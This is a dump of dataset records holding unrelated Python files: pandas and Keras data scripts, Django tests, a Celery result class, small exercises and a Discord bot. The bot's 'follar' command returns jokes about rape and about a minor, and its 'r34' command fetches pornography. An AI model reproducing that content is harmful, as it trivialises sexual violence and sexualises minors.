After calling, all pieces that\n        do not pass the provided filter functions are removed from the corpus object.\n        '''\n        len_old = len(self._pieces)\n        for f in filters:\n            self._pieces = [p for p in self._pieces if f(p)]\n        self._num_rejected += len_old - len(self._pieces)\n\n    def discard_rests(self):\n        '''\n        Discard all rest events in all contained pieces.\n        '''\n        for piece in self._pieces:\n            piece.discard_rests()\n\nclass DataCorpus(AbstractCorpus):\n    '''\n    A DataCorpus contains only \"\"data\"\" of a collection of pieces, intended for use as inputs and\n    targets for a machine learning model. See the `mud.fmt.PieceData` class for more info.\n    '''\n    def __init__(\n            self,\n            corpus: Corpus,\n            formatter: EventDataBuilder,\n            slice_resolution: float,\n            discard_rests: bool = False):\n        self._data = [PieceData(p, formatter, slice_resolution, discard_rests)\n                      for p in corpus.pieces]\n\n    def size(self) -> int:\n        return len(self._data)\n\n    @property\n    def data(self) -> Iterable[PieceData]:\n        return self._data\n\n    def __iter__(self) -> Iterable[PieceData]:\n        return self._data.__iter__()\n    \n    def __len__(self) -> int:\n        return len(self._data)\n\n\n","sub_path":"mud/corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":8066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"346009025","text":"import pandas as pd\nimport datetime\nfrom concat_files import load_csv2df\n\n\ndef review(item):\n    return pd.Series({\n        'Suma': item.sum(),\n        'p_value': item[item.notna()].size / item.size,\n        'missing': item[item.isna()].index.to_list()\n    })\n\n\ndef cheapest(item):\n    return item[item['Suma'] == item['Suma'].min()].iloc[-1]\n\ndef dia_to_ndia(dia):\n    return (dia - datetime.datetime(1970, 1, 1)).days\n\ndef obtener_precio(producto, lugar, fecha_numero):\n    # logic to read the pickle file, load the model, and run the prediction\n    # write here the logic to train and save as a pickle.\n    # arroz_pali.p\n    import pickle\n    from sklearn import linear_model\n    import numpy as np\n    nombre_archivo = f'{producto}_{lugar}.p'\n\n    # Create linear regression object\n    # load the model from disk\n    modelo = pickle.load(open(nombre_archivo, 'rb'))\n    vector_fechas = np.array([fecha_numero]).reshape(-1, 1)\n    precio_predicho = modelo.predict(vector_fechas)\n    return precio_predicho[0][0]\n\ndef rellenado(item):\n\n    def otra_funcion(otro_elemento):\n        lugar = otro_elemento.name[1]\n        fecha = otro_elemento.name[0]\n        producto = otro_elemento.index[0]\n\n        # Prediction using today's date\n        fecha_numero = dia_to_ndia(datetime.datetime.today())\n        # producto, fecha, lugar -> fit \"predict\" ----> number (float)\n        dato = obtener_precio(producto, lugar, fecha_numero)\n        return pd.Series(dato)\n\n    return item.to_frame().apply(otra_funcion, axis=1).iloc[:,0]\n\n\ndef best_price_by_list(data, lista):\n    if data is None:\n        print('No data available')\n        return\n\n    historico = (\n        data.groupby(['Fecha', 'Lugar', 'Producto'])['Precio'].min()\n        .unstack(level=0)\n        .swaplevel()\n        .sort_index()\n        .sort_index(axis=1)\n    )\n\n    selection = (\n        historico.iloc[:, [-1]]\n        .unstack()\n        .loc[lista]\n    )\n\n    def entrenar_modelo(producto, lugar, vector_fechas, vector_precios):\n        import pickle\n        from sklearn import linear_model\n\n        # write here the logic to train and save as a pickle.\n        # arroz_pali.p\n        nombre_archivo = f'{producto}_{lugar}.p'\n        vector_fechas = vector_fechas.reshape(-1, 1)\n        vector_precios = vector_precios.reshape(-1, 1)\n\n        # Create linear regression object\n
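        # (added note) the models pickled here are the ones obtener_precio() reloads\n        # above, keyed by the same f'{producto}_{lugar}.p' naming scheme the record uses\n        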
modelo = linear_model.LinearRegression()\n        modelo.fit(vector_fechas, vector_precios)\n\n        # save the model to disk\n        pickle.dump(modelo, open(nombre_archivo, 'wb'))\n\n    def entrenar(item):\n        mi_serie_limpia = item.dropna()\n        mi_serie_limpia.index = pd.to_datetime(mi_serie_limpia.index)\n        mi_serie_limpia.index = mi_serie_limpia.reset_index().iloc[:, 0].apply(dia_to_ndia)\n        producto, lugar = mi_serie_limpia.name\n        entrenar_modelo(producto, lugar, mi_serie_limpia.index.values, mi_serie_limpia.values)\n\n    # Enable this to generate the trained models and save them as pickle files\n    #historico.apply(entrenar, axis=1)\n\n    # Method that applies the fill-in via linear regression\n    selection = selection.apply(rellenado , axis=1)\n\n    # drop one level: the dates level\n    selection = selection.droplevel(level=0, axis=1)\n\n    res = (\n        selection.apply(review, axis=0)\n        .T.reset_index()\n        .groupby(['p_value']).apply(cheapest)\n    )\n    return res[res['p_value'] == 1]\n\nif __name__ == '__main__':\n    data = load_csv2df()\n    product_list = ['arroz', 'frijoles']\n    print(product_list)\n    print(best_price_by_list(data=data, lista=product_list))\n\n    print('-'* 100)\n    product_list = ['pan', 'queso', 'tomate']\n    print(product_list)\n    print(best_price_by_list(data=data, lista=product_list))\n\n    print('-' * 100)\n    product_list = [ 'queso', 'tomate']\n    print(product_list)\n    print(best_price_by_list(data=data, lista=product_list))\n\n    print('-' * 100)\n    product_list = [ 'cereal', 'jugo']\n    print(product_list)\n    print(best_price_by_list(data=data, lista=product_list))","sub_path":"best_price.py","file_name":"best_price.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"538983163","text":"from rest_framework.test import APITestCase, APIClient, APIRequestFactory\nfrom rest_framework.views import status\nfrom .models import Contractor\nfrom .models import User\nfrom .models import Project\nfrom .models import ContractorProject\nfrom .serializers import ContractorSerializer\nfrom .serializers import ProjectSerializer\n\nclass BaseTest(APITestCase):\n    client = APIClient()\n\nclass UserSeesTheirProjectsTest(BaseTest):\n\n    def test_getting_all_of_a_users_projects(self):\n\n        user_1 = User(\n            full_name='Princess',\n            email='another_castle@mail.com',\n            phone_number='1234566',\n            zip='12345'\n        )\n        user_1.save()\n\n        user_2 = User(\n            full_name='Bowser',\n            email='my_castle@mail.com',\n            phone_number='2234566',\n            zip='22345'\n        )\n        user_2.save()\n\n        project_1 = Project(\n            user=user_1,\n            title='project_numero_uno',\n            description='this is the first project',\n            category='plumbing',\n            user_before_picture='picture.png'\n        )\n        project_1.save()\n\n        project_2 = Project(\n            user=user_1,\n            title='project_numero_dos',\n            description='this is the second project',\n            category='plumbing',\n            user_before_picture='picture.png'\n        )\n        project_2.save()\n\n        project_3 = Project(\n            user=user_2,\n            title='project_numero_tres',\n            description='this is the third project',\n            category='plumbing',\n            user_before_picture='picture.png'\n        )\n        project_3.save()\n\n        contractor_1 = Contractor(\n            name='Mario',\n            email='mario@mail.com',\n            phone_number='111111111',\n            zip='80124',\n            category='plumbing',\n            logo='logo.jpg',\n            example_project_1='picture.png',\n            example_project_2='picture.png'\n        )\n        contractor_1.save()\n\n        contractor_2 = Contractor(\n            name='Luigi',\n            email='Luigi@mail.com',\n            phone_number='222222222',\n            zip='80224',\n            category='plumbing',\n            logo='logo.jpg',\n            
example_project_1='picture.png',\n example_project_2='picture.png'\n )\n contractor_2.save()\n\n contractor_project_1 = ContractorProject(\n project=project_2,\n contractor=contractor_1,\n contractor_choice=0,\n user_choice=True,\n completed=False,\n seen=False,\n contractor_before_picture='picture.png',\n user_rating=5,\n contractor_rating=5\n )\n contractor_project_1.save()\n\n contractor_project_2 = ContractorProject(\n project=project_2,\n contractor=contractor_2,\n contractor_choice=2,\n user_choice=True,\n completed=False,\n seen=False,\n contractor_before_picture='picture.png',\n user_rating=5,\n contractor_rating=5\n )\n contractor_project_2.save()\n\n response = self.client.get(f'/api/v1/users/{user_1.id}/projects', format='json')\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.data), 2)\n self.assertEqual(response.data[0]['id'], project_2.id)\n self.assertEqual(response.data[0]['title'], project_2.title)\n self.assertEqual(response.data[0]['description'], project_2.description)\n self.assertEqual(response.data[0]['category'], project_2.category)\n self.assertEqual(response.data[0]['user_before_picture'], project_2.user_before_picture)\n self.assertEqual(response.data[0]['user_after_picture'], project_2.user_after_picture)\n self.assertEqual(response.data[0]['contractors'][0], {\n 'contractor_id': contractor_2.id,\n 'picture_1': contractor_2.example_project_1,\n 'picture_2': contractor_2.example_project_2,\n 'user_choice': True\n })\n","sub_path":"fix_up/tests_user_sees_their_projects.py","file_name":"tests_user_sees_their_projects.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"341366588","text":"import discord\r\nfrom discord.ext import commands\r\nfrom asyncio import *\r\nimport asyncio\r\nfrom aiohttp import *\r\nimport aiohttp\r\nfrom discord.ext.commands import Bot\r\nfrom discord.utils import find\r\nimport requests\r\nimport os\r\nimport rule34\r\nimport random\r\nimport urllib.request,unicodedata\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.request import urlopen\r\nfrom random import shuffle\r\nfrom googletrans import Translator\r\nimport youtube_dl\r\nimport pycparser\r\nimport json\r\n\r\ndef search_youtube(tag):\r\n textToSearch = tag\r\n query = urllib.request.quote(textToSearch)\r\n url = \"https://www.youtube.com/results?search_query=\" + query\r\n response = urlopen(url)\r\n html = response.read()\r\n soup = BeautifulSoup(html, \"html.parser\")\r\n for vid in soup.findAll(\"a\", attrs={'class':'yt-uix-tile-link'}):\r\n jiji = vid[\"href\"].startswith(\"/watch?v=\")\r\n if not jiji == False:\r\n return 'https://www.youtube.com' + vid[\"href\"]\r\n\r\ntranslator = Translator()\r\nbot = commands.Bot(command_prefix='.+')\r\nloop = asyncio.get_event_loop()\r\nautor = 316736672324911106\r\nspecter = 336215189558919168\r\n\r\nyoutube_dl.utils.bug_reports_message = lambda: ''\r\n\r\nytdl_format_options = {\r\n 'format': 'bestaudio/best',\r\n 'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',\r\n 'restrictfilenames': True,\r\n 'noplaylist': True,\r\n 'nocheckcertificate': True,\r\n 'ignoreerrors': False,\r\n 'logtostderr': False,\r\n 'quiet': True,\r\n 'no_warnings': True,\r\n 'default_search': 'auto',\r\n 'source_address': '0.0.0.0' # bind to ipv4 since ipv6 addresses cause issues sometimes\r\n}\r\n\r\nffmpeg = {\r\n 'options': '-vn'\r\n}\r\n\r\nytdl = youtube_dl.YoutubeDL(ytdl_format_options)\r\n\r\nclass 
YTDLSource(discord.PCMVolumeTransformer):\r\n def __init__(self, source, *, data, volume=0.5):\r\n super().__init__(source, volume)\r\n\r\n self.data = data\r\n\r\n self.title = data.get('title')\r\n self.url = data.get('url')\r\n\r\n @classmethod\r\n async def from_url(cls, url, *, loop=None, stream=False):\r\n loop = loop or asyncio.get_event_loop()\r\n data = await loop.run_in_executor(None, lambda: ytdl.extract_info(url, download=not stream))\r\n\r\n if 'entries' in data:\r\n # take first item from a playlist\r\n data = data['entries'][0]\r\n\r\n filename = data['url'] if stream else ytdl.prepare_filename(data)\r\n return cls(discord.FFmpegPCMAudio(filename, **ffmpeg), data=data)\r\n\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print('Logged in as')\r\n print(bot.user.name)\r\n print(bot.user.id)\r\n print('------')\r\n activity = discord.Game(name=\".+help para ayuda\")\r\n await bot.change_presence(status=discord.Status.idle, activity=activity)\r\n\r\n@bot.event\r\nasync def on_guild_join(guild):\r\n general = find(lambda x: x.name == 'general', guild.text_channels)\r\n if general and general.permissions_for(guild.me).send_messages:\r\n await general.send(\"Hello wa.\")\r\n\r\n@bot.event\r\nasync def on_member_join(member):\r\n await member.send(\"WAlcome.\")\r\n\r\n\r\n@bot.command()\r\nasync def estado(ctx, *args):\r\n mesg = \" \".join(args)\r\n if ctx.author.id == autor:\r\n activity = discord.Game(name=mesg)\r\n await bot.change_presence(status=discord.Status.idle, activity=activity)\r\n else:\r\n await ctx.send(\"No tienes suficientes permisos, {0.author.mention}, sólo el autor del bot puede hacerlo.\".format(ctx))\r\n\r\n@bot.command()\r\nasync def join(ctx, channel: discord.VoiceChannel):\r\n \"\"\"\"Joins a voice channel\"\"\"\r\n\r\n if ctx.voice_client is not None:\r\n return await ctx.voice_client.move_to()\r\n\r\n await channel.connect()\r\n\r\n@bot.command()\r\nasync def yt(ctx, url):\r\n \"\"\"Plays from a url (almost anything youtube_dl supports)\"\"\"\r\n\r\n async with ctx.typing():\r\n player = await YTDLSource.from_url(url, loop=bot.loop)\r\n ctx.voice_client.play(player, after=lambda e: print('Player error: %s' % e) if e else None)\r\n\r\n await ctx.send('Now playing: {}'.format(player.title))\r\n\r\n@bot.command()\r\nasync def s_yt(ctx, *args):\r\n mesg = \" \".join(args)\r\n search = search_youtube(mesg)\r\n if search == \"Error, el vídeo tiene anuncios.\":\r\n await ctx.send(\"Error, el vídeo tiene anuncios, imposible reproducir, inténtelo de nuevo con '.+yt ', lo siento. 
:c\")\r\n else:\r\n async with ctx.typing():\r\n player = await YTDLSource.from_url(search, loop=bot.loop)\r\n ctx.voice_client.play(player, after=lambda e: print('Player error: %s' % e) if e else None)\r\n\r\n await ctx.send('Now playing: {}'.format(player.title))\r\n\r\n@bot.command()\r\nasync def volume(ctx, volume: int):\r\n \"\"\"Changes the player's volume\"\"\"\r\n\r\n if ctx.voice_client is None:\r\n return await ctx.send(\"Not connected to a voice channel.\")\r\n\r\n ctx.voice_client.source.volume = volume\r\n await ctx.send(\"Changed volume to {}%\".format(volume))\r\n\r\n@bot.command()\r\nasync def stop(ctx, channel: discord.VoiceChannel):\r\n \"\"\"Stops and disconnects the bot from voice\"\"\"\r\n\r\n await ctx.voice_client.disconnect()\r\n await channel.connect()\r\n\r\n@bot.command()\r\nasync def s_videos_yt(ctx, *args):\r\n mesg = \" \".join(args)\r\n search = search_youtube(mesg)\r\n await ctx.send(f\"Vídeo más coincidente: {search}\")\r\n\r\n@bot.command()\r\nasync def follar(ctx, member):\r\n if ctx.channel.is_nsfw():\r\n if ctx.author.id == autor and member == f\"<@{bot.user.id}>\":\r\n await ctx.send(\"Ah~~ sí, violame, mi ama. Miau.\")\r\n else:\r\n if member == f\"<@{bot.user.id}>\":\r\n await ctx.send(\"¿Perdona? Estás violando a un bot menor de edad, he mandado a la FBI a buscarte.\")\r\n else:\r\n if ctx.author.id == autor and member == \"<@336215189558919168>\":\r\n await ctx.send(\"{0.author.mention} se foia a \".format(ctx) + member + os.linesep + \"lo goza y es oficialmente parte del harem de Lolire.\")\r\n else:\r\n await ctx.send(\"{0.author.mention} se foia a \".format(ctx) + member)\r\n else:\r\n await ctx.send(\"No puedes utilizar este comando en canales no nsfw. :)\")\r\n\r\n@bot.command()\r\nasync def abrazar(ctx, member):\r\n choice = random.choice([\"https://media.giphy.com/media/3M4NpbLCTxBqU/giphy.gif\", \"https://media.giphy.com/media/l4FGpP4lxGGgK5CBW/giphy.gif\", \"https://media.giphy.com/media/Y6uhhPPB5DYT6/giphy.gif\", \"https://media.giphy.com/media/Bj9k1U69GZ8Iw/giphy.gif\", \"https://media.giphy.com/media/EvYHHSntaIl5m/giphy.gif\", \"https://media.giphy.com/media/xT0Gqne4C3IxaBcOdy/giphy.gif\"])\r\n if choice == \"https://media.giphy.com/media/Y6uhhPPB5DYT6/giphy.gif\":\r\n await ctx.send(\"{0.author.mention} ha abrazado a \".format(ctx) + member + os.linesep + choice + os.linesep + \"Me recuerda a detroit become human, ¿Sabes?, el gif digo.\")\r\n else:\r\n await ctx.send(\"{0.author.mention} ha abrazado a \".format(ctx) + member + os.linesep + choice)\r\n\r\n@bot.command()\r\nasync def besar(ctx, member):\r\n choice = random.choice([\"https://media.giphy.com/media/BUEUprrn4b5zG/giphy.gif\", \"https://media.giphy.com/media/l0HlPkb1ktE2PZFbG/giphy.gif\", \"https://media.giphy.com/media/3XV3AvAo3jiQ8/giphy.gif\"])\r\n await ctx.send(\"{0.author.mention} ha besado a \".format(ctx) + member + os.linesep + choice)\r\n\r\n@bot.command()\r\nasync def say(ctx, *args):\r\n mesg = \" \".join(args)\r\n await ctx.send(mesg)\r\n\r\n@bot.command()\r\nasync def traducir(ctx, dezt, *args):\r\n mesg = \" \".join(args)\r\n idiomaoriginal = translator.detect(mesg)\r\n traducido = translator.translate(mesg, dest=dezt)\r\n await ctx.send(\"El texto traducido es \" + \"**\"+traducido.text+\"**\" + os.linesep + \"El idioma de origen era \" + \"**\"+idiomaoriginal.lang+\"**\")\r\n\r\n@bot.command()\r\nasync def wa(ctx):\r\n await ctx.send(\"Wa\")\r\n\r\n@bot.command()\r\nasync def tts(ctx, *args):\r\n mesg = \" \".join(args)\r\n await ctx.send(mesg, 
tts=True)\r\n\r\n@bot.command()\r\nasync def purr(ctx):\r\n await ctx.send(\"Miau\")\r\n\r\n@bot.command()\r\nasync def r34(ctx, tag):\r\n if ctx.channel.is_nsfw():\r\n loop = asyncio.get_event_loop()\r\n async with aiohttp.ClientSession() as session:\r\n r34 = rule34.Rule34(loop)\r\n URL = await r34.getImageURLS(tags=tag, randomPID=True, singlePage=True)\r\n if URL == None:\r\n choice = random.choice([\"O NOOOOO, 0 RESULTADOS, TE QUEDASTE SIN TU PORNO. :c\", \"No hay resultados, pajero. :c\", \"Lo siento, sin resultados. :c\"])\r\n await ctx.send(choice)\r\n else:\r\n shuffle(URL)\r\n for links in URL:\r\n await ctx.send(str(links) + \" {0.author.mention}\".format(ctx))\r\n await aiohttp.ClientSession.close()\r\n else:\r\n await ctx.send(\"No puedes utilizar este comando en canales no nsfw. :thinking:\")\r\n\r\n\r\nbot.run(os.getenv(\"TOKEN\"))","sub_path":"LoliBot.py","file_name":"LoliBot.py","file_ext":"py","file_size_in_byte":8888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"354020018","text":"import sys\nfrom collections import Counter\n\ndef Least_Common(lst):\n data = Counter(lst)\n return data.most_common(26)[25][0]\n\ndef main(): \n \n with open(sys.argv[1], 'r') as myfile:\n data=myfile.readlines()\n value = [[0 for x in range(0, 598)] for y in range(0, 8)] \n \n for k in range(0, 598): \n for j in range(0, 8):\n value[j][k] = str(data[k][j])\n \n errorCorrected = \"\"\n \n for m in range(0, 8):\n errorCorrected = errorCorrected + Least_Common(value[m])\n \n print(errorCorrected)\n \n \nif __name__ == '__main__':\n main()\n","sub_path":"Day6/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"249172732","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 21 23:38:44 2018\n\n@author: MSG\n\"\"\"\nimport pygal\nimport csv\nfrom datetime import datetime\n#filename = 'sitka_weather_07-2014.csv'\nfilename = 'death_valley_2014.csv'\nwith open(filename) as f:\n #create a reader object\n reader = csv.reader(f)\n #get next line in the file \n #gets the first line of the file, which contains the file headers\n header_row = next(reader)\n #print(header_row)\n \n #We use enumerate() on the list to get the index of each item, as well\n #as the value.\n for index, column_header in enumerate(header_row):\n print(index, column_header)\n \n #Extracting and Reading Data\n \n # Get dates ,low and high temperatures from file.\n dates, high_temps, low_temps = [], [], []\n for row in reader:\n #Because we’ve already read the header row, the loop will begin\n #at the second line where the actual data begins\n try:\n #convert the strings to integers(to allow visualisation)\n current_date = datetime.strptime(row[0], \"%Y-%m-%d\")\n high = int(row[1]) \n low = int(row[2]) \n \n except ValueError:\n #pass\n print(current_date, 'missing data')\n else:\n dates.append(current_date)\n high_temps.append(high)\n low_temps.append(low)\n \n print('high_temps')\n print(high_temps)\n print(' ')\n print('low_temps')\n print(low_temps)\n\n#visualize results\nimport matplotlib.pyplot as plt\n\nfig = plt.figure(dpi=80, figsize=(10, 6))\n#shade areas in the plot\n#use the fill_between() method, which takes a series of x-values and two\n#series of y-values, and fills the space between the two y-value series\n#alpha controls the color's transparency \nplt.plot(dates, high_temps, c='red', alpha=0.6)\nplt.plot(dates, low_temps, 
c='blue', alpha=0.5)\nplt.fill_between(dates, high_temps, low_temps, facecolor='blue', alpha=0.1)\nfig.autofmt_xdate()\n\n\n# Format plot.\nplt.title('Monthly high,and low temperatures, \\n Death_valley 2014', fontsize=24)\nplt.xlabel(' ')\nplt.ylabel('Temperature (F)', fontsize=12)\nplt.tick_params(axis='both', which='major', labelsize=12)\n#plt.savefig('weather_temp.svg')\nplt.savefig('weather_temp.png')\nplt.show()","sub_path":"using pygal/highs_lows.py","file_name":"highs_lows.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"182209153","text":"from mock import Mock\nfrom test_protocol import create_pipes\nfrom .dispatcher import Dispatcher\nfrom .configuration import ConfigurationLibrary\nimport eventlet\nfrom .handshake import ConnectionHandler, client_handshake, WebServer, client_web_connect\nfrom nose.tools import assert_raises, assert_equals\nfrom .protocol import ConnectionLost\nfrom eventlet.green import urllib2\n\n\n\ndef test_server_handshake():\n server, client = create_pipes()\n dispatcher = Mock(Dispatcher)\n library = Mock(ConfigurationLibrary)\n handler = ConnectionHandler(dispatcher, library, 'secret')\n\n thread = eventlet.spawn( handler.new_connection, server )\n\n client_dispatcher, client_library = client_handshake(client, 'secret')\n client_dispatcher.add_worker(None, 7)\n client_library.add('Yellow')\n eventlet.sleep()\n\n\n assert dispatcher.add_worker.called\n library.add.assert_called_with('Yellow')\n\ndef test_server_handshake_unauthorized():\n server, client = create_pipes()\n dispatcher = Mock(Dispatcher)\n library = Mock(ConfigurationLibrary)\n handler = ConnectionHandler(dispatcher, library, 'secret')\n\n thread = eventlet.spawn( handler.new_connection, server )\n\n assert_raises(ConnectionLost, client_handshake, client, 'seret')\n\n\n\n\ndef basic_web_handler(env, start_response):\n start_response('200 OK', [('Content-Type', 'text/plain')])\n return [\"Hello World\"]\n\nclass FakeConnectionHandler(object):\n def __init__(self):\n self.incoming = None\n\n def new_connection(self, connection):\n connection.write('HELLO')\n connection.flush()\n connection.close()\n\ndef test_web():\n webserver = WebServer(basic_web_handler, None)\n eventlet.spawn( webserver.listen, ('', 1996) )\n eventlet.sleep()\n\n data = urllib2.urlopen('http://localhost:1996').read()\n assert_equals(data, 'Hello World')\n\ndef test_not_web():\n webserver = WebServer(None, FakeConnectionHandler())\n eventlet.spawn( webserver.listen, ('', 1997) )\n eventlet.sleep()\n\n client = client_web_connect( ('', 1997) )\n data = client.read(5)\n assert_equals(data, 'HELLO')\n\n","sub_path":"pymultinode/test_handshake.py","file_name":"test_handshake.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"654110548","text":"import numpy as np\nimport pandas as pd\nimport sys\nfrom sklearn import preprocessing\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.models import load_model\n\n\n\ndef PreprocessTestData(raw_df):\n df = raw_df.drop(['Test_ID'], axis = 1)\n\n # df = df.drop(['SEX'], axis = 1)\n\n # df['EDUCATION'] = df['EDUCATION'].map({0:0, 1:1, 2:2, 3:3, 4:0, 5:0, 6:0})\n\n df['PAY_1'] = df['PAY_1'].map({-2:-2, -1:-1, 0:0, 1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:6, 8:6, 9:6})\n\n # x_OneHot_df = pd.get_dummies(data = df, columns = ['MARRIAGE'])\n\n # x_OneHot_df = 
x_OneHot_df.drop(['MARRIAGE_0'], axis = 1)\n\n # x_OneHot_df = pd.get_dummies(data = df, columns = ['EDUCATION'])\n # x_OneHot_df = x_OneHot_df.drop(['EDUCATION_0'], axis = 1)\n\n x_OneHot_df = pd.get_dummies(data = df, columns = ['PAY_1'])\n\n x_OneHot_df = x_OneHot_df.drop(['PAY_1_6'], axis = 1)\n\n\n ndarray = x_OneHot_df.values\n\n\n # print ndarray[:2]\n\n Features = ndarray\n\n minmax_scale = preprocessing.MinMaxScaler(feature_range=(0, 1))\n\n scaledFeatures = minmax_scale.fit_transform(Features)\n\n return scaledFeatures\n\n\n\nif __name__ == '__main__':\n model = load_model('model.h5')\n\n test_public_df = pd.read_csv(sys.argv[1])\n test_private_df = pd.read_csv(sys.argv[2])\n\n\n test_Features = PreprocessTestData(test_public_df)\n test_probability = model.predict(test_Features)\n\n p = test_public_df\n p.insert(len(test_public_df.columns), 'probability', test_probability)\n\n lc = pd.DataFrame(data = p)\n\n lc = lc.rename(columns = {'Test_ID': 'Rank_ID'})\n\n\n d = lc.sort_values(by = ['probability'], ascending = False)\n\n Rank = d.iloc[:, 0]\n\n Rank.to_csv('public.csv', index = None, header = 'Rank_ID')\n\n\n\n test_Features = PreprocessTestData(test_private_df)\n test_probability = model.predict(test_Features)\n\n p = test_private_df\n p.insert(len(test_private_df.columns), 'probability', test_probability)\n\n lc = pd.DataFrame(data = p)\n\n lc = lc.rename(columns = {'Test_ID': 'Rank_ID'})\n\n\n d = lc.sort_values(by = ['probability'], ascending = False)\n\n Rank = d.iloc[:, 0]\n\n Rank.to_csv('private.csv', index = None, header = 'Rank_ID')\n\n\n","sub_path":"kaggle/te1.py","file_name":"te1.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"149941216","text":"from time import sleep\n\nprint('* '*26)\nprint('{:^50}'.format('CAIXA ELETRÔNICO'))\nprint('* '*26)\n\nvalor = int(input('\\nQual valor deseja sacar? 
R$ '))\n\ntotal = valor\nced = 50\ntotced = 0\n\nprint('\\nCalculando', end='')\nsleep(0.5)\nprint('.', end='')\nsleep(0.5)\nprint('.', end='')\nsleep(0.5)\nprint('.')\n\nwhile True:\n    if total >= ced:\n        total -= ced\n        totced += 1\n    else:\n        if totced > 0:\n            print(f'\\nTotal de {totced} cédulas de R$ {ced:.2f}')\n        if ced == 50:\n            ced = 20\n        elif ced == 20:\n            ced = 10\n        elif ced == 10:\n            ced = 1\n        totced = 0\n        if total == 0:\n            break\n\nprint('\\n')\nprint('* '*26)\nprint('{:^50}'.format('FIM DO PROGRAMA'))\nprint('* '*26)","sub_path":"Mundo-02/ex71-2-sacar-atm.py","file_name":"ex71-2-sacar-atm.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"244176703","text":"from __future__ import absolute_import\nfrom __future__ import with_statement\n\nfrom functools import partial\n\nimport celery\n\n\nclass AsyncResult(celery.result.AsyncResult):\n    def __init__(self, task_id, status=None, traceback=None,\n                 result=None, producer=None, **kwargs):\n        super(AsyncResult, self).__init__(task_id)\n        self._status = status\n        self._traceback = traceback\n        self._result = result\n        self._producer = producer\n\n    @property\n    def status(self):\n        return self._status or super(AsyncResult, self).status\n    state = status\n\n    @property\n    def traceback(self):\n        if self._result is not None:\n            return self._traceback\n        else:\n            return super(AsyncResult, self).traceback\n\n    @property\n    def result(self):\n        return self._result or super(AsyncResult, self).result\n\n    def get(self, callback=None):\n        self._producer.fail_if_backend_not_supported()\n        self._producer.consumer.wait_for(self.task_id,\n                partial(self.on_result, callback),\n                expires=self._producer.prepare_expires(type=int),\n                persistent=self._producer.app.conf.CELERY_RESULT_PERSISTENT)\n\n    def on_result(self, callback, reply):\n        reply = self._producer.decode(reply)\n        self._status = reply.get('status')\n        self._traceback = reply.get('traceback')\n        self._result = reply.get('result')\n        if callback:\n            callback(self._result)\n\n    def _get_task_meta(self):\n        self._producer.fail_if_backend_not_supported()\n        return super(AsyncResult, self)._get_task_meta()\n\n    def maybe_reraise(self):\n        if self.state in celery.states.PROPAGATE_STATES:\n            raise super(AsyncResult, self).result\n","sub_path":"tcelery/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"133500916","text":"import numpy\n\nclass GameOfLife:\n    # Width and height\n    B_HEIGHT = 30\n    B_WIDTH = 40\n\n    # Arrays to represent board\n    # Initialized in constructor\n    board = []\n    board_next = []\n\n    def printBoard(self):\n        # Iterate through 2D array\n        for y in range(self.B_HEIGHT):\n            for x in range(self.B_WIDTH):\n                # If board location is a 0, print a \"dead\" cell, if it is 1 print a \"live\" cell\n                print('-' if (not(self.board[(x, y)])) else 'X', end='')\n            # New line to end row\n            print('')\n\n    def iterateNeighbors(self, x, y):\n        curr = (x, y) # Current (x, y) coordinate\n        live_neighbors = 0 # Init number of live neighboring cells\n        for modifier_x in [-1, 0, 1]: # Iterate through horizontal values for left and right\n            for modifier_y in [-1, 0, 1]: # Iterate through vertical values for up and down\n                offset_coor = (x + modifier_x, y + modifier_y) #Get current neighboring cell\n                # Check modifiers are not both 0 and not calculating on current cell\n                if (offset_coor != curr): \n                    try:\n                        if(self.board[offset_coor]):\n
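                            # (added note) numpy's negative indexing wraps -1 offsets to the\n                            # opposite edge, so left/top borders behave toroidally; only positive\n                            # out-of-range offsets raise the IndexError caught below\n                            live_neighbors += 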
1\n # Will be caught if coordinates are above or below the arrays index range\n except IndexError:\n continue\n\n # If cell is alive:\n # With < 2 or > 3 neighbors it will die\n if(self.board[curr] and (live_neighbors < 2 or live_neighbors > 3)):\n return 0\n # With 2 or 3 neighbors it will live\n elif(self.board[curr] and (live_neighbors == 2 or live_neighbors == 3)):\n return 1\n # If cell is dead:\n # With exactly 3 neighbors it will be born as a live cell\n elif(not(self.board[curr]) and live_neighbors == 3):\n return 1\n\n return 0\n\n def calculateNextGen(self):\n # Iterate through current game board\n for y in range(self.B_HEIGHT):\n for x in range(self.B_WIDTH):\n # Set next generations current cell to value return when examining neighbors\n self.board_next[x][y] = self.iterateNeighbors(x, y)\n\n # Overwrite this generation with the newest generation\n self.board = numpy.copy(self.board_next)\n\n def nextGeneration(self, console=False):\n # Print the game board if console mode is passsed\n if(console):\n self.printBoard()\n print('')\n\n # Get next generation (Will overwrite board automatically) \n self.calculateNextGen()\n\n def reset(self):\n self.board = numpy.array([[0 for y in 